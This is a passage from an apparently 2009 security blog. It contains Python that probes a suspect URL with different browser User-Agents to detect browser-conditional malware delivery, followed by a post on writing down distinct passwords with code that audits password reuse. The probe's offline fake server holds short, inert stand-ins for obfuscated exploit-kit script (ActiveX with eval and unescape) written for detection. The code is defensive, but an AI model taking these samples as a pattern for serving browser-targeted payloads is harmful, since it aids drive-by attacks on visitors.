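    for name, ua in agents.items():
        body = fetch(url, ua)
        text = body.decode("latin-1")  # never raises; we only want substrings
        results[name] = {
            "sha256": hashlib.sha256(body).hexdigest(),
            "size": len(body),
            "markers": sorted(k for k, rx in MARKERS.items() if rx.search(text)),
        }
    return results


def group_by_response(results):
    """Which browsers received byte-identical content? {sha256: [browsers]}"""
    groups = defaultdict(list)
    for name, summary in sorted(results.items()):
        groups[summary["sha256"]].append(name)
    return dict(groups)


def is_browser_conditional(results):
    """True when at least two browsers were handed different bodies."""
    return len(group_by_response(results)) > 1


# Constructed stand-in for the fast-flux node, so the probe runs offline.
# It mimics the behaviour described in the post: IE gets ActiveX/obfuscated
# script, Firefox/Opera get a browser-specific script, everything else a PDF.
def fake_server(url, user_agent):
    if "MSIE" in user_agent:
        return b"<html><script>var o=new ActiveXObject('x');eval(unescape('%75'))</script></html>"
    if "Firefox" in user_agent or "Opera" in user_agent:
        return b"<html><script>eval(unescape('%62'))</script></html>"
    return b"<html><object data='x.pdf' type='application/pdf'></object></html>"


if __name__ == "__main__":
    res = probe("http://suspect.invalid/", fetch=fake_server)  # constructed URL
    for browser, summary in res.items():
        print(browser, summary["size"], summary["markers"])
    print("browser-conditional:", is_browser_conditional(res))
    print(group_by_response(res))
```

Against a live host, call `probe(url)` with the default fetcher; a result where `is_browser_conditional` is true and the marker sets differ per browser is the signature the post describes. Bear in mind that legitimate sites also vary content by User-Agent, so treat a positive as a lead to pull the bodies apart by hand, not as a verdict.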

Shout-outs to our friend at the IRS and Nick.



Monday, January 19, 2009

Write your passwords down

Hi folks,

For most of the last 20 years or so that I've been paying attention to computer security, the mantra has been "Don't write your passwords down .... someone might steal your postit note... make a password you can remember."

Now, this is a Good Idea, _except_ that it encourages most people to have just one password... Or maybe two, if you have a really strong memory. And, unlike twenty years ago, where you maybe only had an email password, and a network login password at the office, there are now a zillion places to log into. As well as your email and the office, there's all the web 2.0 (or as I like to put it, the web 2.uh-oh) stuff ... your bank, youtube, myspace, facebook, amazon, ebay and twitter to mention but a few. Guess what ... if they're all using the same password, and _one_ of them gets hacked or phished, you lose your password to everywhere. If that includes your bank or paypal password, that's about the key to the kingdom, and you might not even know until real money starts disappearing.

Instead of using just one or two passwords, have many, and _write them down_.... either in your wallet or in a database. If you lose your wallet, at least you'll know to reset your passwords, as well as cancel your credit cards.

Remember, there's now a whole industry comprised of people whose job it is to compromise your security. They go hungry if they don't, so they are highly motivated to be successful. Be careful on the Internet.
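To make the "one phished site takes the rest with it" point concrete, and to show what "many passwords, written down in a database" looks like in practice, here is an added example (mine, not the author's, and not describing any AVG product). The account list is constructed sample data; the "database" is just a list of tuples, which you would in reality keep in an encrypted password manager rather than plain text.

```python
"""Audit a password list for reuse, show the blast radius of one phished site,
and issue a fresh random password per site (added example, constructed data)."""
import hashlib
import secrets
import string
from collections import defaultdict

# Characters drawn from when generating; assumption: most sites accept these.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*()-_=+[]{};:,.?/"

# Constructed sample "written-down" database: (site, username, password).
# Three sites share one password, exactly the situation the post warns about.
SAMPLE_DB = [
    ("webmail", "alice", "Summer2009!"),
    ("bank", "alice", "Summer2009!"),
    ("youtube", "alice", "Summer2009!"),
    ("ebay", "alice", "hunter2"),
]


def fingerprint(password):
    """Short hash so reports never echo the password itself."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()[:12]


def reuse_report(db):
    """Map each reused password's fingerprint to the sites sharing it."""
    by_pw = defaultdict(list)
    for site, _user, pw in db:
        by_pw[fingerprint(pw)].append(site)
    return {fp: sorted(sites) for fp, sites in by_pw.items() if len(sites) > 1}


def blast_radius(db, phished_site):
    """If `phished_site` leaks its password, which other accounts fall too?"""
    leaked = {site: pw for site, _user, pw in db}.get(phished_site)
    if leaked is None:
        return []
    return sorted(site for site, _user, pw in db
                  if pw == leaked and site != phished_site)


def generate_password(length=16, alphabet=ALPHABET):
    """Random password from the OS CSPRNG; one per site, never reused."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    return "".join(secrets.choice(alphabet) for _ in range(length))


def rotate_all(db, length=16):
    """Return a new database with a distinct random password for every site."""
    return [(site, user, generate_password(length)) for site, user, _pw in db]


if __name__ == "__main__":
    print("reused:", reuse_report(SAMPLE_DB))
    print("phish youtube, also lose:", blast_radius(SAMPLE_DB, "youtube"))
    fresh = rotate_all(SAMPLE_DB)
    print("after rotation, phish youtube, also lose:", blast_radius(fresh, "youtube"))
```

Run it and the report shows that phishing the YouTube login also hands over webmail and the bank; after `rotate_all` the same phish costs exactly one account. The generated passwords are not memorable, which is the point of the post: they live in the written-down database, not in your head.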

Cheers folks,